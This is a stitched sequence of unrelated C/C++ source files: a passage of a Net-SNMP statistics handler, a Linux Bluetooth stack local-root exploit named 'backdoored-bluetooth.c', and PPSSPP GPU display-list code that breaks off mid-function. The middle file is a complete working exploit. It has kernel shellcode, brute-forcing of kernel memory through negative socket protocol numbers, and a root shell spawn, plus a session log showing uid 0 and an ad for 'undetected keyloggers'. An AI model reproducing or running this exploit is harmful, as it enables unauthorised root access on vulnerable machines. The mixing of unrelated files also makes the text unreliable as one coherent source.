{SNMPUNKNOWNSECURITYMODELS, ASN_COUNTER, NETSNMP_OLDAPI_RONLY,
var_snmpMPDStats, 1, {1}},
{SNMPINVALIDMSGS, ASN_COUNTER, NETSNMP_OLDAPI_RONLY,
var_snmpMPDStats, 1, {2}},
{SNMPUNKNOWNPDUHANDLERS, ASN_COUNTER, NETSNMP_OLDAPI_RONLY,
var_snmpMPDStats, 1, {3}},
};
/*
 * now load this mib into the agents mib table
 */
/* Registration prefix: .1.3.6.1.6.3.11.2.1 (snmpMPDStats). */
oid snmpMPDStats_variables_oid[] =
{ 1, 3, 6, 1, 6, 3, 11, 2, 1 };
/* Register the snmpMPDStats subtree with the agent and advertise the
 * MPD MIB capability in sysORTable. */
void
init_snmpMPDStats(void)
{
static oid reg[] = { 1, 3, 6, 1, 6, 3, 11, 3, 1, 1 };
REGISTER_SYSOR_ENTRY(reg,
"The MIB for Message Processing and Dispatching.");
REGISTER_MIB("snmpv3/snmpMPDStats", snmpMPDStats_variables, variable2,
snmpMPDStats_variables_oid);
}
/*
 * Handler for the snmpMPDStats counters: maps the table entry's magic
 * value onto the agent's MPD statistics slots and returns a pointer to
 * a static long holding the counter. All objects are read-only.
 */
u_char *
var_snmpMPDStats(struct variable *vp,
oid * name,
size_t * length,
int exact, size_t * var_len, WriteMethod ** write_method)
{
	static long long_ret;       /* backing store for the returned value */
	int magic;

	*write_method = NULL;       /* every object in this group is read-only */
	*var_len = sizeof(long_ret);
	if (header_generic(vp, name, length, exact, var_len, write_method))
		return NULL;

	/* Magic values index the MPD statistic range; reject anything else. */
	magic = vp->magic;
	if (magic < 0 || magic > (STAT_MPD_STATS_END - STAT_MPD_STATS_START))
		return NULL;

	long_ret = snmp_get_statistic(magic + STAT_MPD_STATS_START);
	return (u_char *) &long_ret;
}
| gpl-2.0 |
balle/bluediving | tools/backdoored-bluetooth.c | 4 | 4574 | /* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT
*
* 19 October 2005
http://backdoored.net
Visit us for Undetected keyloggers and packers.Thanx
h4x0r bluetooth $ id
uid=1000(addicted) gid=100(users) groups=100(users)
h4x0r bluetooth $
h4x0r bluetooth $ ./backdoored-bluetooth
KERNEL Oops. Exit Code = 11.(Segmentation fault)
KERNEL Oops. Exit Code = 11.(Segmentation fault)
KERNEL Oops. Exit Code = 11.(Segmentation fault)
KERNEL Oops. Exit Code = 11.(Segmentation fault)
KERNEL Oops. Exit Code = 11.(Segmentation fault)
Checking the Effective user id after overflow : UID = 0
h4x0r bluetooth # id
uid=0(root) gid=0(root) groups=100(users)
h4x0r bluetooth #
h4x0r bluetooth # dmesg
PREEMPT SMP
Modules linked in:
CPU: 0
EIP: 0060:[<c0405ead>] Not tainted VLI
EFLAGS: 00010286 (2.6.9)
EIP is at bt_sock_create+0x3d/0x130
eax: ffffffff ebx: ffebfe34 ecx: 00000000 edx: c051bea0
esi: ffffffa3 edi: ffffff9f ebp: 00000001 esp: c6729f1c
ds: 007b es: 007b ss: 0068
Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20)
Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34
00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34
c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80
Call Trace:
[<c039a3bb>] __sock_create+0xfb/0x2a0
[<c039a58d>] sock_create+0x2d/0x40
[<c039a60b>] sys_socket+0x2b/0x60
[<c039b4e8>] sys_socketcall+0x68/0x260
[<c0117a9c>] finish_task_switch+0x3c/0x90
[<c0117b07>] schedule_tail+0x17/0x50
[<c0115410>] do_page_fault+0x0/0x5e9
[<c01031af>] syscall_call+0x7/0xb
Code: 24 0c 89 7c 24 10 83 fb 07 0f 8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00
85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <unistd.h>
#include <limits.h>
#include <signal.h>
#include <sys/wait.h>
#define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000
#define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff
#define KERNEL_SPACE_BUFFER 0x100000
char asmcode[] = /*Global shellcode*/
"\xb8\x00\xf0\xff\xff\x31\xc9\x21\xe0\x8b\x10\x89\x8a"
"\x80\x01\x00\x00\x31\xc9\x89\x8a\x7c\x01\x00\x00\x8b"
"\x00\x31\xc9\x31\xd2\x89\x88\x90\x01\x00\x00\x89\x90"
"\x8c\x01\x00\x00\xb8\xff\xff\xff\xff\xc3";
struct net_proto_family {
int family;
int (*create) (int *sock, int protocol);
short authentication;
short encryption;
short encrypt_net;
int *owner;
};
int check_zombie_child(int status,pid_t pid)
{
waitpid(pid,&status,0);
if(WIFEXITED(status))
{
if(WEXITSTATUS(status) != 0xFF)
exit(-1);
}
else if (WIFSIGNALED(status))
{
printf("KERNEL Oops. Exit Code = %d.(%s)\n",WTERMSIG(status),strsignal(WTERMSIG(status)));
return(WTERMSIG(status));
}
}
int brute_socket_create (int negative_proto_number)
{
socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */
int i;
i = geteuid();
printf("Checking the Effective user id after overflow : UID = %d\n",i);
if(i)
exit(EXIT_FAILURE);
printf("0wnage D0ne bro.\n");
execl("/bin/sh","sh",NULL);
exit(EXIT_SUCCESS);
}
int main(void)
{
pid_t pid;
int counter;
int status;
int *kernel_return;
char kernel_buffer[KERNEL_SPACE_BUFFER];
unsigned int brute_start;
unsigned int where_kernel;
struct net_proto_family *bluetooth;
bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family));
bzero(bluetooth,sizeof(struct net_proto_family));
bluetooth->family = AF_BLUETOOTH;
bluetooth->authentication = 0x0; /* No Authentication */
bluetooth->encryption = 0x0; /* No Encryption */
bluetooth->encrypt_net = 0x0; /* No Encrypt_net */
bluetooth->owner = 0x0; /* No fucking owner */
bluetooth->create = (int *) asmcode;
kernel_return = (int *) kernel_buffer;
for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++)
*kernel_return = (int)bluetooth;
brute_start = KERNEL_SPACE_MEMORY_BRUTE_START;
printf("Bluetooth stack local root exploit\n");
printf("http://backdoored/net");
while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END )
{
where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ;
where_kernel = -where_kernel;
pid = fork();
if(pid == 0 )
brute_socket_create(where_kernel);
check_zombie_child(status,pid);
brute_start += KERNEL_SPACE_BUFFER;
fflush(stdout);
}
return 0;
}
| gpl-2.0 |
jduranmaster/ppsspp | GPU/GPUCommon.cpp | 4 | 33951 | #include <algorithm>
#include "base/mutex.h"
#include "base/timeutil.h"
#include "Common/ColorConv.h"
#include "GPU/GeDisasm.h"
#include "GPU/GPU.h"
#include "GPU/GPUCommon.h"
#include "GPU/GPUState.h"
#include "ChunkFile.h"
#include "Core/Config.h"
#include "Core/CoreTiming.h"
#include "Core/MemMap.h"
#include "Core/Host.h"
#include "Core/Reporting.h"
#include "Core/HLE/HLE.h"
#include "Core/HLE/sceKernelMemory.h"
#include "Core/HLE/sceKernelInterrupt.h"
#include "Core/HLE/sceKernelThread.h"
#include "Core/HLE/sceGe.h"
// Constructor: resets display-list bookkeeping (Reinitialize), builds the
// color-conversion tables, honors the "separate CPU thread" config option
// and initializes the global graphics state.
GPUCommon::GPUCommon() :
dumpNextFrame_(false),
dumpThisFrame_(false)
{
Reinitialize();
SetupColorConv();
SetThreadEnabled(g_Config.bSeparateCPUThread);
InitGfxState();
}
// Destructor: tears down the global graphics state acquired by
// InitGfxState() in the constructor.
GPUCommon::~GPUCommon() {
ShutdownGfxState();
}
// Reset all display-list tracking and timing state, as on construction.
void GPUCommon::Reinitialize() {
	easy_guard guard(listLock);
	memset(dls, 0, sizeof(dls));
	for (auto &dl : dls) {
		dl.state = PSP_GE_DL_STATE_NONE;
		dl.waitTicks = 0;
	}

	nextListID = 0;
	currentList = nullptr;
	isbreak = false;
	drawCompleteTicks = 0;
	busyTicks = 0;
	timeSpentStepping_ = 0.0;
	interruptsEnabled_ = true;
	UpdateTickEstimate(0);
}
// Drop the front display list from the queue and promote the next one,
// carrying over the RUNNING state if the popped list was running.
void GPUCommon::PopDLQueue() {
	easy_guard guard(listLock);
	if (dlQueue.empty())
		return;

	dlQueue.pop_front();
	if (dlQueue.empty()) {
		currentList = nullptr;
		return;
	}

	// Check before reassigning: was the list we're replacing running?
	const bool wasRunning = currentList->state == PSP_GE_DL_STATE_RUNNING;
	currentList = &dls[dlQueue.front()];
	if (wasRunning)
		currentList->state = PSP_GE_DL_STATE_RUNNING;
}
bool GPUCommon::BusyDrawing() {
u32 state = DrawSync(1);
if (state == PSP_GE_LIST_DRAWING || state == PSP_GE_LIST_STALLING) {
lock_guard guard(listLock);
if (currentList && currentList->state != PSP_GE_DL_STATE_PAUSED) {
return true;
}
}
return false;
}
// Implements sceGeDrawSync. mode 0 blocks the calling PSP thread until all
// queued lists complete (not allowed from interrupts or with dispatch
// disabled); mode 1 polls and returns the current queue state.
u32 GPUCommon::DrawSync(int mode) {
if (ThreadEnabled()) {
// Sync first, because the CPU is usually faster than the emulated GPU.
SyncThread();
}
easy_guard guard(listLock);
if (mode < 0 || mode > 1)
return SCE_KERNEL_ERROR_INVALID_MODE;
if (mode == 0) {
if (!__KernelIsDispatchEnabled()) {
return SCE_KERNEL_ERROR_CAN_NOT_WAIT;
}
if (__IsInInterrupt()) {
return SCE_KERNEL_ERROR_ILLEGAL_CONTEXT;
}
if (drawCompleteTicks > CoreTiming::GetTicks()) {
// Still busy: park the thread until the drawing-complete event.
__GeWaitCurrentThread(GPU_SYNC_DRAW, 1, "GeDrawSync");
} else {
// Already idle: recycle completed list slots immediately.
for (int i = 0; i < DisplayListMaxCount; ++i) {
if (dls[i].state == PSP_GE_DL_STATE_COMPLETED) {
dls[i].state = PSP_GE_DL_STATE_NONE;
}
}
}
return 0;
}
// If there's no current list, it must be complete.
DisplayList *top = NULL;
for (auto it = dlQueue.begin(), end = dlQueue.end(); it != end; ++it) {
if (dls[*it].state != PSP_GE_DL_STATE_COMPLETED) {
top = &dls[*it];
break;
}
}
if (!top || top->state == PSP_GE_DL_STATE_COMPLETED)
return PSP_GE_LIST_COMPLETED;
// NOTE(review): currentList is assumed non-null once an uncompleted list
// exists in the queue - confirm against the scheduling paths.
if (currentList->pc == currentList->stall)
return PSP_GE_LIST_STALLING;
return PSP_GE_LIST_DRAWING;
}
// If no lists remain queued, recycle every slot back to NONE so their IDs
// become available again.
void GPUCommon::CheckDrawSync() {
	easy_guard guard(listLock);
	if (!dlQueue.empty())
		return;
	for (int i = 0; i < DisplayListMaxCount; ++i)
		dls[i].state = PSP_GE_DL_STATE_NONE;
}
// sceGeListSync: mode 1 polls the state of a single list; mode 0 blocks the
// caller until that list's waitTicks have passed.
int GPUCommon::ListSync(int listid, int mode) {
	if (ThreadEnabled()) {
		// Sync first, because the CPU is usually faster than the emulated GPU.
		SyncThread();
	}
	easy_guard guard(listLock);
	if (listid < 0 || listid >= DisplayListMaxCount)
		return SCE_KERNEL_ERROR_INVALID_ID;

	if (mode < 0 || mode > 1)
		return SCE_KERNEL_ERROR_INVALID_MODE;

	DisplayList& dl = dls[listid];
	if (mode == 1) {
		// Non-blocking poll: map internal state to sceGe list status codes.
		switch (dl.state) {
		case PSP_GE_DL_STATE_QUEUED:
			if (dl.interrupted)
				return PSP_GE_LIST_PAUSED;
			return PSP_GE_LIST_QUEUED;

		case PSP_GE_DL_STATE_RUNNING:
			if (dl.pc == dl.stall)
				return PSP_GE_LIST_STALLING;
			return PSP_GE_LIST_DRAWING;

		case PSP_GE_DL_STATE_COMPLETED:
			return PSP_GE_LIST_COMPLETED;

		case PSP_GE_DL_STATE_PAUSED:
			return PSP_GE_LIST_PAUSED;

		default:
			return SCE_KERNEL_ERROR_INVALID_ID;
		}
	}

	// mode == 0: blocking wait, only legal with dispatch enabled and outside
	// interrupt context.
	if (!__KernelIsDispatchEnabled()) {
		return SCE_KERNEL_ERROR_CAN_NOT_WAIT;
	}
	if (__IsInInterrupt()) {
		return SCE_KERNEL_ERROR_ILLEGAL_CONTEXT;
	}

	if (dl.waitTicks > CoreTiming::GetTicks()) {
		__GeWaitCurrentThread(GPU_SYNC_LIST, listid, "GeListSync");
	}
	return PSP_GE_LIST_COMPLETED;
}
// sceGeGetStack: copies call-stack entry 'index' of the current list into
// guest memory at stackPtr (when index >= 0 and the pointer is valid) and
// returns the current stack depth.
int GPUCommon::GetStack(int index, u32 stackPtr) {
	easy_guard guard(listLock);
	if (currentList == NULL) {
		// Seems like it doesn't return an error code?
		return 0;
	}

	if (currentList->stackptr <= index) {
		return SCE_KERNEL_ERROR_INVALID_INDEX;
	}

	if (index >= 0) {
		auto stack = PSPPointer<u32>::Create(stackPtr);
		if (stack.IsValid()) {
			auto entry = currentList->stack[index];
			// Not really sure what most of these values are.
			stack[0] = 0;
			stack[1] = entry.pc + 4;
			stack[2] = entry.offsetAddr;
			stack[7] = entry.baseAddr;
		}
	}

	return currentList->stackptr;
}
// sceGeListEnQueue / sceGeListEnQueueHead: register a new display list.
// listpc/stall must be word-aligned. Returns the new list ID on success, or
// a kernel error code. With head == true the list is pushed to the front in
// PAUSED state (the current list, if any, must itself be paused).
u32 GPUCommon::EnqueueList(u32 listpc, u32 stall, int subIntrBase, PSPPointer<PspGeListArgs> args, bool head) {
	easy_guard guard(listLock);
	// TODO Check the stack values in missing arg and ajust the stack depth
	// Check alignment
	// TODO Check the context and stack alignement too
	if (((listpc | stall) & 3) != 0)
		return SCE_KERNEL_ERROR_INVALID_POINTER;

	int id = -1;
	u64 currentTicks = CoreTiming::GetTicks();
	u32_le stackAddr = args.IsValid() ? args->stackAddr : 0;
	// Check compatibility
	if (sceKernelGetCompiledSdkVersion() > 0x01FFFFFF) {
		//numStacks = 0;
		//stack = NULL;
		for (int i = 0; i < DisplayListMaxCount; ++i) {
			if (dls[i].state != PSP_GE_DL_STATE_NONE && dls[i].state != PSP_GE_DL_STATE_COMPLETED) {
				// Logically, if the CPU has not interrupted yet, it hasn't seen the latest pc either.
				// Exit enqueues right after an END, which fails without ignoring pendingInterrupt lists.
				if (dls[i].pc == listpc && !dls[i].pendingInterrupt) {
					ERROR_LOG(G3D, "sceGeListEnqueue: can't enqueue, list address %08X already used", listpc);
					return 0x80000021;
				} else if (stackAddr != 0 && dls[i].stackAddr == stackAddr && !dls[i].pendingInterrupt) {
					ERROR_LOG(G3D, "sceGeListEnqueue: can't enqueue, stack address %08X already used", stackAddr);
					return 0x80000021;
				}
			}
		}
	}
	// TODO Check if list stack dls[i].stack already used then return 0x80000021 as above

	// Find a free slot, scanning round-robin from nextListID. A COMPLETED
	// slot is only reusable once its waitTicks have passed.
	for (int i = 0; i < DisplayListMaxCount; ++i) {
		int possibleID = (i + nextListID) % DisplayListMaxCount;
		// Take a reference, not a copy - DisplayList is large (it embeds a
		// 32-entry call stack), so the old by-value copy per iteration was
		// pure waste.
		const auto &possibleList = dls[possibleID];
		if (possibleList.pendingInterrupt) {
			continue;
		}

		if (possibleList.state == PSP_GE_DL_STATE_NONE) {
			id = possibleID;
			break;
		}
		if (possibleList.state == PSP_GE_DL_STATE_COMPLETED && possibleList.waitTicks < currentTicks) {
			id = possibleID;
		}
	}
	if (id < 0) {
		ERROR_LOG_REPORT(G3D, "No DL ID available to enqueue");
		for (auto it = dlQueue.begin(); it != dlQueue.end(); ++it) {
			DisplayList &dl = dls[*it];
			DEBUG_LOG(G3D, "DisplayList %d status %d pc %08x stall %08x", *it, dl.state, dl.pc, dl.stall);
		}
		return SCE_KERNEL_ERROR_OUT_OF_MEMORY;
	}
	nextListID = id + 1;

	// Initialize the chosen slot. Addresses are masked to the 256MB physical
	// range.
	DisplayList &dl = dls[id];
	dl.id = id;
	dl.startpc = listpc & 0x0FFFFFFF;
	dl.pc = listpc & 0x0FFFFFFF;
	dl.stall = stall & 0x0FFFFFFF;
	dl.subIntrBase = std::max(subIntrBase, -1);
	dl.stackptr = 0;
	dl.signal = PSP_GE_SIGNAL_NONE;
	dl.interrupted = false;
	dl.waitTicks = (u64)-1;
	dl.interruptsEnabled = interruptsEnabled_;
	dl.started = false;
	dl.offsetAddr = 0;
	dl.bboxResult = false;
	dl.stackAddr = stackAddr;

	if (args.IsValid() && args->context.IsValid())
		dl.context = args->context;
	else
		dl.context = 0;

	if (head) {
		// Enqueue-at-head requires the current list (if any) to be paused.
		if (currentList) {
			if (currentList->state != PSP_GE_DL_STATE_PAUSED)
				return SCE_KERNEL_ERROR_INVALID_VALUE;
			currentList->state = PSP_GE_DL_STATE_QUEUED;
		}

		dl.state = PSP_GE_DL_STATE_PAUSED;

		currentList = &dl;
		dlQueue.push_front(id);
	} else if (currentList) {
		// Something is already running or paused; just append.
		dl.state = PSP_GE_DL_STATE_QUEUED;
		dlQueue.push_back(id);
	} else {
		// Nothing active: start running immediately.
		dl.state = PSP_GE_DL_STATE_RUNNING;
		currentList = &dl;
		dlQueue.push_front(id);

		drawCompleteTicks = (u64)-1;

		// TODO save context when starting the list if param is set
		// Drop the lock before kicking the queue to avoid self-deadlock.
		guard.unlock();
		ProcessDLQueue();
	}

	return id;
}
// sceGeListDeQueue: cancel a queued list that has not started executing yet
// and wake any thread waiting on it via ListSync.
u32 GPUCommon::DequeueList(int listid) {
	easy_guard guard(listLock);
	if (listid < 0 || listid >= DisplayListMaxCount || dls[listid].state == PSP_GE_DL_STATE_NONE)
		return SCE_KERNEL_ERROR_INVALID_ID;

	auto &dl = dls[listid];
	if (dl.started)
		return SCE_KERNEL_ERROR_BUSY;

	dl.state = PSP_GE_DL_STATE_NONE;
	if (listid == dlQueue.front())
		PopDLQueue();
	else
		dlQueue.remove(listid);

	// Release anyone blocked in sceGeListSync on this list.
	dl.waitTicks = 0;
	__GeTriggerWait(GPU_SYNC_LIST, listid);

	// The queue may now be empty; recycle slots if so.
	CheckDrawSync();

	return 0;
}
// sceGeListUpdateStallAddr: move a list's stall address, then kick the
// queue so execution can proceed past the old stall point.
u32 GPUCommon::UpdateStall(int listid, u32 newstall) {
	easy_guard guard(listLock);
	const bool badID = listid < 0 || listid >= DisplayListMaxCount;
	if (badID || dls[listid].state == PSP_GE_DL_STATE_NONE)
		return SCE_KERNEL_ERROR_INVALID_ID;

	DisplayList &list = dls[listid];
	if (list.state == PSP_GE_DL_STATE_COMPLETED)
		return SCE_KERNEL_ERROR_ALREADY;

	// Mask to the physical address range.
	list.stall = newstall & 0x0FFFFFFF;

	// Drop the lock before running the queue to avoid self-deadlock.
	guard.unlock();
	ProcessDLQueue();
	return 0;
}
// sceGeContinue: resume a paused list. If the pause came from sceGeBreak,
// the list only returns to QUEUED. Error codes depend on the compiled SDK
// version of the running game.
u32 GPUCommon::Continue() {
	easy_guard guard(listLock);
	if (!currentList)
		return 0;

	if (currentList->state == PSP_GE_DL_STATE_PAUSED)
	{
		if (!isbreak)
		{
			// TODO: Supposedly this returns SCE_KERNEL_ERROR_BUSY in some case, previously it had
			// currentList->signal == PSP_GE_SIGNAL_HANDLER_PAUSE, but it doesn't reproduce.
			currentList->state = PSP_GE_DL_STATE_RUNNING;
			currentList->signal = PSP_GE_SIGNAL_NONE;

			// TODO Restore context of DL is necessary
			// TODO Restore BASE

			// We have a list now, so it's not complete.
			drawCompleteTicks = (u64)-1;
		}
		else
			currentList->state = PSP_GE_DL_STATE_QUEUED;
	}
	else if (currentList->state == PSP_GE_DL_STATE_RUNNING)
	{
		// Can't continue a list that's already running.
		if (sceKernelGetCompiledSdkVersion() >= 0x02000000)
			return 0x80000020;
		return -1;
	}
	else
	{
		// Not paused and not running - nothing to continue.
		if (sceKernelGetCompiledSdkVersion() >= 0x02000000)
			return 0x80000004;
		return -1;
	}

	// Drop the lock before kicking the queue.
	guard.unlock();
	ProcessDLQueue();
	return 0;
}
// sceGeBreak: mode 1 resets the entire queue; mode 0 pauses the current
// list. Return values vary by current list state and compiled SDK version.
u32 GPUCommon::Break(int mode) {
	easy_guard guard(listLock);
	if (mode < 0 || mode > 1)
		return SCE_KERNEL_ERROR_INVALID_MODE;

	if (!currentList)
		return SCE_KERNEL_ERROR_ALREADY;

	if (mode == 1)
	{
		// Clear the queue
		dlQueue.clear();
		for (int i = 0; i < DisplayListMaxCount; ++i)
		{
			dls[i].state = PSP_GE_DL_STATE_NONE;
			dls[i].signal = PSP_GE_SIGNAL_NONE;
		}

		nextListID = 0;
		currentList = NULL;
		return 0;
	}

	if (currentList->state == PSP_GE_DL_STATE_NONE || currentList->state == PSP_GE_DL_STATE_COMPLETED)
	{
		// Nothing breakable.
		if (sceKernelGetCompiledSdkVersion() >= 0x02000000)
			return 0x80000004;
		return -1;
	}

	if (currentList->state == PSP_GE_DL_STATE_PAUSED)
	{
		// Already paused - newer SDKs report that explicitly.
		if (sceKernelGetCompiledSdkVersion() > 0x02000010)
		{
			if (currentList->signal == PSP_GE_SIGNAL_HANDLER_PAUSE)
			{
				ERROR_LOG_REPORT(G3D, "sceGeBreak: can't break signal-pausing list");
			}
			else
				return SCE_KERNEL_ERROR_ALREADY;
		}
		return SCE_KERNEL_ERROR_BUSY;
	}

	if (currentList->state == PSP_GE_DL_STATE_QUEUED)
	{
		currentList->state = PSP_GE_DL_STATE_PAUSED;
		return currentList->id;
	}

	// TODO Save BASE
	// TODO Adjust pc to be just before SIGNAL/END

	// TODO: Is this right?
	if (currentList->signal == PSP_GE_SIGNAL_SYNC)
		currentList->pc += 8;

	currentList->interrupted = true;
	currentList->state = PSP_GE_DL_STATE_PAUSED;
	currentList->signal = PSP_GE_SIGNAL_HANDLER_SUSPEND;
	// Remember that this pause came from Break, so Continue behaves differently.
	isbreak = true;

	return currentList->id;
}
// Records when the debugger enters stepping mode so the time spent stepping
// can be excluded from display-list processing stats.
void GPUCommon::NotifySteppingEnter() {
	if (g_Config.bShowDebugStats) {
		time_update();
		timeSteppingStarted_ = time_now_d();
	}
}

// Accumulates the time spent stepping since NotifySteppingEnter().
void GPUCommon::NotifySteppingExit() {
	if (g_Config.bShowDebugStats) {
		if (timeSteppingStarted_ <= 0.0) {
			ERROR_LOG(G3D, "Mismatched stepping enter/exit.");
		}
		time_update();
		timeSpentStepping_ += time_now_d() - timeSteppingStarted_;
		timeSteppingStarted_ = 0.0;
	}
}
// Execute a display list until it stalls, completes, errors, or is
// interrupted. Returns true when the list is done (or errored), false when
// it merely yielded (paused/stalled).
bool GPUCommon::InterpretList(DisplayList &list) {
	// Initialized to avoid a race condition with bShowDebugStats changing.
	double start = 0.0;
	if (g_Config.bShowDebugStats) {
		time_update();
		start = time_now_d();
	}

	easy_guard guard(listLock);

	if (list.state == PSP_GE_DL_STATE_PAUSED)
		return false;
	currentList = &list;

	if (!list.started && list.context.IsValid()) {
		// Save the caller's GE context on first entry; restored on FINISH.
		gstate.Save(list.context);
	}
	list.started = true;

	gstate_c.offsetAddr = list.offsetAddr;

	if (!Memory::IsValidAddress(list.pc)) {
		ERROR_LOG_REPORT(G3D, "DL PC = %08x WTF!!!!", list.pc);
		return true;
	}

	cycleLastPC = list.pc;
	// Flat startup cost per list.
	cyclesExecuted += 60;
	downcount = list.stall == 0 ? 0x0FFFFFFF : (list.stall - list.pc) / 4;
	list.state = PSP_GE_DL_STATE_RUNNING;
	list.interrupted = false;

	gpuState = list.pc == list.stall ? GPUSTATE_STALL : GPUSTATE_RUNNING;
	// Release the lock while the run loops execute; they re-acquire as needed.
	guard.unlock();

	const bool useDebugger = host->GPUDebuggingActive();
	const bool useFastRunLoop = !dumpThisFrame_ && !useDebugger;
	while (gpuState == GPUSTATE_RUNNING) {
		{
			easy_guard innerGuard(listLock);
			if (list.pc == list.stall) {
				gpuState = GPUSTATE_STALL;
				downcount = 0;
			}
		}

		if (useFastRunLoop) {
			FastRunLoop(list);
		} else {
			SlowRunLoop(list);
		}

		{
			easy_guard innerGuard(listLock);
			downcount = list.stall == 0 ? 0x0FFFFFFF : (list.stall - list.pc) / 4;

			if (gpuState == GPUSTATE_STALL && list.stall != list.pc) {
				// Unstalled.
				gpuState = GPUSTATE_RUNNING;
			}
		}
	}

	FinishDeferred();

	// We haven't run the op at list.pc, so it shouldn't count.
	if (cycleLastPC != list.pc) {
		UpdatePC(list.pc - 4, list.pc);
	}

	list.offsetAddr = gstate_c.offsetAddr;

	if (g_Config.bShowDebugStats) {
		time_update();
		// Exclude debugger stepping time from the processing stats.
		double total = time_now_d() - start - timeSpentStepping_;
		hleSetSteppingTime(timeSpentStepping_);
		timeSpentStepping_ = 0.0;
		gpuStats.msProcessingDisplayLists += total;
	}
	return gpuState == GPUSTATE_DONE || gpuState == GPUSTATE_ERROR;
}
// Debug/dump run loop: executes ops one at a time with pre-execute hooks
// and optional disassembly logging. Used when the debugger is active or a
// frame dump was requested; slower than FastRunLoop.
void GPUCommon::SlowRunLoop(DisplayList &list)
{
	const bool dumpThisFrame = dumpThisFrame_;
	while (downcount > 0)
	{
		host->GPUNotifyCommand(list.pc);
		u32 op = Memory::ReadUnchecked_U32(list.pc);
		u32 cmd = op >> 24;

		// diff = bits that changed vs. the currently latched value for cmd.
		u32 diff = op ^ gstate.cmdmem[cmd];
		PreExecuteOp(op, diff);
		if (dumpThisFrame) {
			char temp[256];
			u32 prev;
			if (Memory::IsValidAddress(list.pc - 4)) {
				prev = Memory::ReadUnchecked_U32(list.pc - 4);
			} else {
				prev = 0;
			}
			GeDisassembleOp(list.pc, op, prev, temp, 256);
			NOTICE_LOG(G3D, "%08x: %s", op, temp);
		}
		gstate.cmdmem[cmd] = op;

		ExecuteOp(op, diff);

		list.pc += 4;
		--downcount;
	}
}
// The newPC parameter is used for jumps, we don't count cycles between.
// Accounts estimated GPU cycles for the ops executed since cycleLastPC,
// then recomputes the run-loop downcount for the (possibly new) pc.
void GPUCommon::UpdatePC(u32 currentPC, u32 newPC) {
	// Rough estimate, 2 CPU ticks (it's double the clock rate) per GPU instruction.
	u32 executed = (currentPC - cycleLastPC) / 4;
	cyclesExecuted += 2 * executed;
	cycleLastPC = newPC;

	if (g_Config.bShowDebugStats) {
		gpuStats.otherGPUCycles += 2 * executed;
		// Bucket by call depth, capped at 3.
		gpuStats.gpuCommandsAtCallLevel[std::min(currentList->stackptr, 3)] += executed;
	}

	// Exit the runloop and recalculate things.  This happens a lot in some games.
	easy_guard innerGuard(listLock);
	if (currentList)
		downcount = currentList->stall == 0 ? 0x0FFFFFFF : (currentList->stall - newPC) / 4;
	else
		downcount = 0;
}
// Re-executes the latched GE state commands, on the GPU thread when one is
// in use (the actual work happens in ReapplyGfxStateInternal).
void GPUCommon::ReapplyGfxState() {
	if (IsOnSeparateCPUThread()) {
		ScheduleEvent(GPU_EVENT_REAPPLY_GFX_STATE);
	} else {
		ReapplyGfxStateInternal();
	}
}

// Re-runs latched command words to rebuild derived state (e.g. after a
// context restore), skipping commands with addressing/pc side effects.
void GPUCommon::ReapplyGfxStateInternal() {
	// The commands are embedded in the command memory so we can just reexecute the words. Convenient.
	// To be safe we pass 0xFFFFFFFF as the diff.
	for (int i = GE_CMD_VERTEXTYPE; i < GE_CMD_BONEMATRIXNUMBER; i++) {
		if (i != GE_CMD_ORIGIN && i != GE_CMD_OFFSETADDR) {
			ExecuteOp(gstate.cmdmem[i], 0xFFFFFFFF);
		}
	}

	// Can't write to bonematrixnumber here

	for (int i = GE_CMD_MORPHWEIGHT0; i <= GE_CMD_PATCHFACING; i++) {
		ExecuteOp(gstate.cmdmem[i], 0xFFFFFFFF);
	}

	// There are a few here in the middle that we shouldn't execute...

	for (int i = GE_CMD_VIEWPORTX1; i < GE_CMD_TRANSFERSTART; i++) {
		ExecuteOp(gstate.cmdmem[i], 0xFFFFFFFF);
	}

	// Let's just skip the transfer size stuff, it's just values.
}

// Sets the run-loop state; any non-RUNNING state forces the loop to exit by
// zeroing the downcount.
inline void GPUCommon::UpdateState(GPURunState state) {
	gpuState = state;
	if (state != GPUSTATE_RUNNING)
		downcount = 0;
}
// Dispatch a GPU-thread event to its handler.
void GPUCommon::ProcessEvent(GPUEvent ev) {
	if (ev.type == GPU_EVENT_PROCESS_QUEUE) {
		ProcessDLQueueInternal();
	} else if (ev.type == GPU_EVENT_REAPPLY_GFX_STATE) {
		ReapplyGfxStateInternal();
	} else {
		ERROR_LOG_REPORT(G3D, "Unexpected GPU event type: %d", (int)ev);
	}
}
// Peek at the front of the display-list queue; -1 when nothing is pending.
int GPUCommon::GetNextListIndex() {
	easy_guard guard(listLock);
	return dlQueue.empty() ? -1 : dlQueue.front();
}

// Ask the GPU thread (or run inline when single-threaded) to process the
// queued display lists.
bool GPUCommon::ProcessDLQueue() {
	ScheduleEvent(GPU_EVENT_PROCESS_QUEUE);
	return true;
}
// Runs every runnable list in the queue to completion (or until one
// yields), then records draw-complete timing and wakes DrawSync waiters.
void GPUCommon::ProcessDLQueueInternal() {
	startingTicks = CoreTiming::GetTicks();
	cyclesExecuted = 0;
	UpdateTickEstimate(std::max(busyTicks, startingTicks + cyclesExecuted));

	// Game might've written new texture data.
	gstate_c.textureChanged = TEXCHANGE_UPDATED;

	// Seems to be correct behaviour to process the list anyway?
	if (startingTicks < busyTicks) {
		DEBUG_LOG(G3D, "Can't execute a list yet, still busy for %lld ticks", busyTicks - startingTicks);
		//return;
	}

